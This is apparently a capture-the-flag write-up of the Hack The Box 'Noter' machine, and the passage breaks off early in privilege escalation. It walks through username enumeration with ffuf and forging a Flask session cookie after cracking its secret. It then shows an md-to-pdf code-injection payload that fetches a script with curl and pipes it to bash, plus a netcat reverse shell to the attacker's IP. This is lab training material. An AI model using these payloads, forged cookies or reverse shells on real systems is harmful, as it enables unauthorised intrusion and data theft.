I"Óì<h2 id="enumeration">Enumeration.</h2>
<h3 id="nmap-scan">Nmap Scan.</h3>
<p><strong>Command</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre>nmap -sC -sV -oN nmap-scan 10.10.11.160
</pre></td></tr></tbody></table></code></pre></div></div>
<p><strong>Result</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre></td> --><td class="rouge-code"><pre># Nmap 7.92 scan initiated Tue Sep  6 08:54:37 2022 as: nmap -sC -sV -oN nmap-scan 10.10.11.160
Nmap scan report for noter.htb (10.10.11.160)
Host is up (0.16s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c6:53:c6:2a:e9:28:90:50:4d:0c:8d:64:88:e0:08:4d (RSA)
|   256 5f:12:58:5f:49:7d:f3:6c:bd:9b:25:49:ba:09:cc:43 (ECDSA)
|_  256 f1:6b:00:16:f7:88:ab:00:ce:96:af:a6:7e:b5:a8:39 (ED25519)
5000/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
|_http-title: Noter
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep  6 08:55:12 2022 -- 1 IP address (1 host up) scanned in 35.55 seconds
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Ports <code class="language-plaintext highlighter-rouge">21</code> <code class="language-plaintext highlighter-rouge">22</code> <code class="language-plaintext highlighter-rouge">5000</code> are all open.</p>
<h3 id="access-the-web-page-by-using-port-5000">Access the web page by using port <code class="language-plaintext highlighter-rouge">5000</code></h3>
<p><img src="/assets/img/noter/001login.png" alt="image" /></p>

<p>The web offered a login form with a permission to register new account if user doesn‚Äôt have one.</p>
<h3 id="register-new-account">Register new Account.</h3>
<p><img src="/assets/img/noter/01register.png" alt="image" /></p>
<h3 id="login-as-new-registered-user">Login as new registered user.</h3>
<p><img src="/assets/img/noter/02login.png" alt="image" /></p>

<p>After creating a new account this website redirects user to the login page. But on trying to provide some incorrect information in login form the page replies with two different error messages as  show below.</p>

<p><img src="/assets/img/noter/04badpassword.png" alt="image" /></p>

<p>The above error message appeared after providing wrong password.</p>

<p><img src="/assets/img/noter/04invalidlogin.png" alt="image" /></p>

<p>This one appeared after providing the name that does not exist. Hence due to this we can brute force users because the web application provides different messages in response to present and absence users.</p>
<h3 id="brute-forcing-available-users-in-the-server">Brute forcing available users in the server.</h3>
<p><strong>Burpsuite</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td> --><td class="rouge-code"><pre>POST /login HTTP/1.1
Host: 10.10.11.160:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://10.10.11.160:5000
Connection: close
Referer: http://10.10.11.160:5000/login
Upgrade-Insecure-Requests: 1

username=gems&amp;password=1234
</pre></td></tr></tbody></table></code></pre></div></div>
<p><strong>Creating a  simple word list to prove how the web react</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td> --><td class="rouge-code"><pre>julius
soraely
gemstone
gems
invalid
user
</pre></td></tr></tbody></table></code></pre></div></div>
<p>This word list has both valid user and invalid users and it was named as <code class="language-plaintext highlighter-rouge">users.txt</code></p>

<p><strong>ffuf bruteforcing</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
</pre></td> --><td class="rouge-code"><pre>
‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/C7F5/htb/noter]
‚îî‚îÄ$ ffuf -u http://10.10.11.160:5000/login -d 'username=FUZZ&amp;password=1234' -w users.txt -H 'Content-Type: application/x-www-form-urlencoded'

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.5.0 Kali Exclusive &lt;3
________________________________________________

 :: Method           : POST
 :: URL              : http://10.10.11.160:5000/login
 :: Wordlist         : FUZZ: users.txt
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Data             : username=FUZZ&amp;password=1234
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

invalid                 [Status: 200, Size: 2035, Words: 432, Lines: 69, Duration: 182ms]
soraely                 [Status: 200, Size: 2035, Words: 432, Lines: 69, Duration: 180ms]
julius                  [Status: 200, Size: 2034, Words: 432, Lines: 69, Duration: 187ms]
gemstone                [Status: 200, Size: 2036, Words: 432, Lines: 69, Duration: 414ms]
gems                    [Status: 200, Size: 2032, Words: 432, Lines: 69, Duration: 411ms]
user                    [Status: 200, Size: 2032, Words: 432, Lines: 69, Duration: 193ms]
                        [Status: 200, Size: 2028, Words: 432, Lines: 69, Duration: 191ms]
:: Progress: [7/7] :: Job [1/1] :: 55 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
</pre></td></tr></tbody></table></code></pre></div></div>
<p>This will not respond because <code class="language-plaintext highlighter-rouge">ffuf</code> does not add <code class="language-plaintext highlighter-rouge">Content-Type</code> header by default then lets add it.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/C7F5/htb/noter]
‚îî‚îÄ$ ffuf -u http://10.10.11.160:5000/login -d 'username=FUZZ&amp;password=1234' -H 'Content-Type: application/x-www-form-urlencoded' -w users.txt -mr 'Invalid login'

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.5.0 Kali Exclusive &lt;3
________________________________________________

 :: Method           : POST
 :: URL              : http://10.10.11.160:5000/login
 :: Wordlist         : FUZZ: users.txt
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Data             : username=FUZZ&amp;password=1234
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Regexp: Invalid login
________________________________________________

gems                    [Status: 200, Size: 2026, Words: 432, Lines: 69, Duration: 757ms]
:: Progress: [8/8] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
</pre></td></tr></tbody></table></code></pre></div></div>
<p>The above command was used to brute force username and match the regular expression where by when username is valid but password is  invalid it will say <code class="language-plaintext highlighter-rouge">Invalid login</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/C7F5/htb/noter]
‚îî‚îÄ$ ffuf -u http://10.10.11.160:5000/login -d 'username=FUZZ&amp;password=1234' -H 'Content-Type: application/x-www-form-urlencoded' -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -mr 'Invalid login'

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.5.0 Kali Exclusive &lt;3
________________________________________________

 :: Method           : POST
 :: URL              : http://10.10.11.160:5000/login
 :: Wordlist         : FUZZ: /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Data             : username=FUZZ&amp;password=1234
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Regexp: Invalid login
________________________________________________

blue                    [Status: 200, Size: 2026, Words: 432, Lines: 69, Duration: 451ms]
Blue                    [Status: 200, Size: 2026, Words: 432, Lines: 69, Duration: 1235ms]
BLUE                    [Status: 200, Size: 2026, Words: 432, Lines: 69, Duration: 1646ms]
[WARN] Caught keyboard interrupt (Ctrl-C)
</pre></td></tr></tbody></table></code></pre></div></div>
<p>After bruteforcing the users the final result was user present in the system is named as <code class="language-plaintext highlighter-rouge">blue</code> with case insensitive.</p>

<h3 id="login-as-user-blue">Login as user Blue.</h3>
<p>One thing about this system is that, it uses the cookies in validating its users and the type of cookie used is similar to <code class="language-plaintext highlighter-rouge">flask</code> You can use <a href="https://jwt.io/">jwt.io</a> But this was not so promising. But we can use another command line tool named as <code class="language-plaintext highlighter-rouge">flask-unsign</code> this can be found in <a href="https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/flask">hacktricks</a></p>

<p><strong>Decode the cookie.</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/C7F5/htb/noter]
‚îî‚îÄ$ flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiZ2VtcyJ9.YxbpxQ.Q5UcakqxCPP3pg8bBEzdrwl0zgc'
{'logged_in': True, 'username': 'gems'}
</pre></td></tr></tbody></table></code></pre></div></div>
<p><strong>Brute force the secrete found in cookie.</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/C7F5/htb/noter]
‚îî‚îÄ$ flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiZ2VtcyJ9.YxbpxQ.Q5UcakqxCPP3pg8bBEzdrwl0zgc' --no-literal-eval                                                    1 ‚®Ø
[*] Session decodes to: {'logged_in': True, 'username': 'gems'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 17152 attempts
b'secret123'
</pre></td></tr></tbody></table></code></pre></div></div>
<p><strong>Sign new cookie by using name blue</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(gemstone„âøhashghost)-[~/C7F5/htb/noter]
‚îî‚îÄ$ flask-unsign --sign --cookie "{'logged_in': True, 'username' :'blue'}" --secret secret123
eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYmx1ZSJ9.Yxc8bw.C-YhDDgLnjr7P0CAWt91XmvyZDg
</pre></td></tr></tbody></table></code></pre></div></div>
<h3 id="login-as-user-blue-1">Login as user Blue.</h3>
<p>Provide the cookies for user <code class="language-plaintext highlighter-rouge">blue</code> refresh the site and then click dashboard.</p>

<p><img src="/assets/img/noter/09blue.png" alt="image" /></p>

<p>Click on edit note.</p>

<p><img src="/assets/img/noter/10note.png" alt="image" /></p>

<p>Clicking on notes.</p>

<p><img src="/assets/img/noter/11notes.png" alt="image" /></p>

<p>Click the premium membership.</p>

<p><img src="/assets/img/noter/12noteftp.png" alt="image" /></p>

<p>You will find a message that shows how to access the <code class="language-plaintext highlighter-rouge">ftp</code> server</p>

<h3 id="access-ftp-server">Access ftp server.</h3>

<p><code class="language-plaintext highlighter-rouge">username : blue</code> <code class="language-plaintext highlighter-rouge">password : blue@Noter!</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/C7F5/htb/noter]
‚îî‚îÄ$ ftp 10.10.11.160
Connected to 10.10.11.160.
220 (vsFTPd 3.0.3)
Name (10.10.11.160:egovridc): blue
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; 
</pre></td></tr></tbody></table></code></pre></div></div>
<p>The username and password let us in where can access the <code class="language-plaintext highlighter-rouge">policy.pdf</code> file and download it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td> --><td class="rouge-code"><pre>ftp&gt; dir
229 Entering Extended Passive Mode (|||15543|)
150 Here comes the directory listing.
drwxr-xr-x    2 1002     1002         4096 May 02 23:05 files
-rw-r--r--    1 1002     1002        12569 Dec 24  2021 policy.pdf
226 Directory send OK.
ftp&gt; get policy.pdf
local: policy.pdf remote: policy.pdf
229 Entering Extended Passive Mode (|||19866|)
150 Opening BINARY mode data connection for policy.pdf (12569 bytes).
100% |*************************************************************************************************************************************************************************************************| 12569      260.58 MiB/s    00:00 ETA
226 Transfer complete.
12569 bytes received in 00:00 (159.82 MiB/s)
</pre></td></tr></tbody></table></code></pre></div></div>
<p><strong>Checking policy.pdf metadata</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/C7F5/htb/noter]
‚îî‚îÄ$ exiftool policy.pdf 

ExifTool Version Number         : 12.44
File Name                       : policy.pdf
Directory                       : .
File Size                       : 13 kB
File Modification Date/Time     : 2021:12:24 23:59:36+03:00
File Access Date/Time           : 2022:09:06 10:27:40+03:00
File Inode Change Date/Time     : 2022:09:06 10:27:40+03:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Title                           : Markdown To PDF
Creator                         : wkhtmltopdf 0.12.5
Producer                        : Qt 4.8.7
Create Date                     : 2021:12:24 20:59:32Z
Page Count                      : 1
Page Mode                       : UseOutlines
</pre></td></tr></tbody></table></code></pre></div></div>
<p>This file can be open as normal pdf file and after opened it shows another clue to access the <code class="language-plaintext highlighter-rouge">ftp</code> server by using <code class="language-plaintext highlighter-rouge">ftp_admin</code>
<code class="language-plaintext highlighter-rouge">username : ftp_admin </code> <code class="language-plaintext highlighter-rouge">password : ftp_admin@Noter!</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/C7F5/htb/noter]
‚îî‚îÄ$ ftp 10.10.11.160
Connected to 10.10.11.160.
220 (vsFTPd 3.0.3)
Name (10.10.11.160:egovridc): ftp_admin
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; dir
229 Entering Extended Passive Mode (|||37886|)
150 Here comes the directory listing.
-rw-r--r--    1 1003     1003        25559 Nov 01  2021 app_backup_1635803546.zip
-rw-r--r--    1 1003     1003        26298 Dec 01  2021 app_backup_1638395546.zip
226 Directory send OK.
ftp&gt; get app_backup_1635803546.zip
local: app_backup_1635803546.zip remote: app_backup_1635803546.zip
229 Entering Extended Passive Mode (|||9496|)
150 Opening BINARY mode data connection for app_backup_1635803546.zip (25559 bytes).
100% |*************************************************************************************************************************************************************************************************| 25559       13.96 KiB/s    00:00 ETA
226 Transfer complete.
25559 bytes received in 00:01 (12.79 KiB/s)
ftp&gt; get app_backup_1638395546.zip
local: app_backup_1638395546.zip remote: app_backup_1638395546.zip
229 Entering Extended Passive Mode (|||27494|)
150 Opening BINARY mode data connection for app_backup_1638395546.zip (26298 bytes).
100% |*************************************************************************************************************************************************************************************************| 26298       78.13 KiB/s    00:00 ETA
226 Transfer complete.
26298 bytes received in 00:00 (51.95 KiB/s)
</pre></td></tr></tbody></table></code></pre></div></div>
<p>After login as  <code class="language-plaintext highlighter-rouge">ftp_amin</code> two backup files were found and downloaded.</p>

<h3 id="enumeration-on-the-backup-files">Enumeration on the backup files.</h3>

<p>Checking the difference between the  two files.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/C7F5/htb/noter/app]
‚îî‚îÄ$ diff -r -y 1 2 | less 
</pre></td></tr></tbody></table></code></pre></div></div>
<p>There is a difference in MySQL configurations</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>app.config['MYSQL_USER'] = 'root'                             | app.config['MYSQL_USER'] = 'DB_user'
app.config['MYSQL_PASSWORD'] = 'Nildogg36'                    | app.config['MYSQL_PASSWORD'] = 'DB_password'
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Also there is directory for attachment in the right hand side file.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>                                                            &gt; attachment_dir = 'misc/attachments/'
                                                              &gt;
# init MYSQL                                                    # init MYSQL
</pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="vulnerability">Vulnerability.</h3>
<p>In a new added directory, there is a <code class="language-plaintext highlighter-rouge">javascript</code> code which allows the convention of <code class="language-plaintext highlighter-rouge">markdown</code> files to <code class="language-plaintext highlighter-rouge">pdf</code>  the vulnerability rises where the first line terminates and a new variable added which contains malicious payloads.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/‚Ä¶/noter/app/2/misc]
‚îî‚îÄ$ cat md-to-pdf.js 
const { mdToPdf } = require('md-to-pdf');


(async () =&gt; {
await mdToPdf({ content: process.argv[2] }, { dest: './misc/attachments/' + process.argv[3] + '.pdf'});
})();
</pre></td></tr></tbody></table></code></pre></div></div>

<p><a href="https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880">Exploit</a> Original  payload.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre>const { mdToPdf } = require('md-to-pdf'); var payload = '---jsn((require("child_process")).execSync("id &gt; /tmp/RCE.txt"))\n---RCE'; 
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Modified payload according to our needs.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td> --><td class="rouge-code"><pre>---js\n((require("child_process")).execSync("curl 10.10.14.114:8000/RCE"))\n---RCE

#This works fine in the following format
---js
((require("child_process")).execSync("curl 10.10.14.114:8000/RCE"))
---RCE
</pre></td></tr></tbody></table></code></pre></div></div>
<p>The above command tries to access the server(Attackers machine) as a child process of the following.</p>

<p><img src="/assets/img/noter/13rcesuccess.png" alt="" /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/‚Ä¶/htb/noter/app/www]
‚îî‚îÄ$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.160 - - [06/Sep/2022 13:04:11] "GET /test.md HTTP/1.1" 200 -
10.10.11.160 - - [06/Sep/2022 13:05:26] "GET /test.md HTTP/1.1" 200 -
10.10.11.160 - - [06/Sep/2022 13:06:46] "GET /test.md HTTP/1.1" 200 -
10.10.11.160 - - [06/Sep/2022 13:07:55] "GET /test.md HTTP/1.1" 200 -
10.10.11.160 - - [06/Sep/2022 13:08:36] "GET /test.md HTTP/1.1" 200 -
10.10.11.160 - - [06/Sep/2022 13:09:18] "GET /test.md HTTP/1.1" 200 -
10.10.11.160 - - [06/Sep/2022 13:09:29] "GET /test.md HTTP/1.1" 200 -
10.10.11.160 - - [06/Sep/2022 13:09:51] "GET /test.md HTTP/1.1" 200 -
10.10.11.160 - - [06/Sep/2022 13:09:52] code 404, message File not found
10.10.11.160 - - [06/Sep/2022 13:09:52] "GET /RCE HTTP/1.1" 404 -
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Simple explanation of the attacking scenario.</p>
<ol>
  <li>Attacker will create a file known as <code class="language-plaintext highlighter-rouge">test.md</code> which have a malicious payloads.</li>
  <li>Attacker will host the site by using python server.</li>
  <li>On website when user clicks the export button the <code class="language-plaintext highlighter-rouge">test.md</code> will be executed and the most important part is the file named <code class="language-plaintext highlighter-rouge">RCE</code></li>
  <li><strong>Creating a file with a reverse shell payload.</strong></li>
</ol>

<p><em><strong>RCE</strong></em></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.114 1234 &gt;/tmp/f
</pre></td></tr></tbody></table></code></pre></div></div>
<p><em><strong>test.md</strong></em></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre>---js\n((require("child_process")).execSync("curl 10.10.14.114:8000/RCE | bash"))\n---RCE
</pre></td></tr></tbody></table></code></pre></div></div>
<p><em><strong>netcat</strong></em></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/C7F5/htb/noter]
‚îî‚îÄ$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.114] from (UNKNOWN) [10.10.11.160] 50186
/bin/sh: 0: can't access tty; job control turned off
$ whoami
svc
$ 
</pre></td></tr></tbody></table></code></pre></div></div>
<h2 id="privilege-escalation">Privilege Escalation.</h2>
<p>After get shell, there are few files that contains important information, one of these files contain the database credentials as shown below.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td> --><td class="rouge-code"><pre>svc@noter:~/app/web$ cat app.py | grep pass
from passlib.hash import sha256_crypt
app.config['MYSQL_PASSWORD'] = 'DB_password'
    password = PasswordField('Password', [
        password = sha256_crypt.encrypt(str(form.password.data))
        cur.execute("INSERT INTO users(name, email, username, password) VALUES(%s, %s, %s, %s)", (name, email, username, password))
        password_candidate = request.form['password']
            password = data['password']
            if sha256_crypt.verify(password_candidate, password):
</pre></td></tr></tbody></table></code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">dbusername : DB_user</code> <code class="language-plaintext highlighter-rouge">dbpassowrd : DB_password</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>svc@noter:~/app/web$ grep DB_ app.py
app.config['MYSQL_USER'] = 'DB_user'
app.config['MYSQL_PASSWORD'] = 'DB_password'
</pre></td></tr></tbody></table></code></pre></div></div>
<h3 id="access-the-database">Access the database.</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td> --><td class="rouge-code"><pre>svc@noter:~/app/web$ mysql -u DB_user -p 
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 36884
Server version: 10.3.32-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]&gt; 
</pre></td></tr></tbody></table></code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
</pre></td> --><td class="rouge-code"><pre>MariaDB [(none)]&gt; show databases;
+--------------------+
| Database           |
+--------------------+
| app                |
| information_schema |
| test               |
+--------------------+
3 rows in set (0.001 sec)

MariaDB [(none)]&gt; use app;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [app]&gt; show tables;
+---------------+
| Tables_in_app |
+---------------+
| notes         |
| users         |
+---------------+
2 rows in set (0.000 sec)

MariaDB [app]&gt; select * from users;
+-------------+----------------+----------+-------------------------------------------------------------------------------+------+
| name        | email          | username | password                                                                      | role |
+-------------+----------------+----------+-------------------------------------------------------------------------------+------+
| Blue Wilson | blue@Noter.htb | blue     | $5$rounds=535000$76NyOgtW18b3wIqL$HZqlzNHs1SdzbAb2V6EyAnqYNskA3K.8e1iDesL5vI2 | VIP  |
| rezo        | rezo@gmail.com | rezo     | $5$rounds=535000$dZpVV9KWPTdQFbTX$9OF5eGYjVNN4qkqoWChh8/lJj2RSUpL0N29rybSKDs. | NULL |
+-------------+----------------+----------+-------------------------------------------------------------------------------+------+
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Nothing interest in this database.</p>
<h3 id="run-linpeas">Run linpeas.</h3>
<p>Linpeas shows the result that there is a user <code class="language-plaintext highlighter-rouge">mysql</code> but it is running as <code class="language-plaintext highlighter-rouge">root</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td> --><td class="rouge-code"><pre>‚ïî‚ïê‚ïê‚ïê‚ïê‚ïê‚ïê‚ïê‚ïê‚ïê‚ïê‚ï£ All users &amp; groups
uid=0(root) gid=0(root) groups=0(root)
uid=1001(svc) gid=1001(svc) groups=1001(svc)
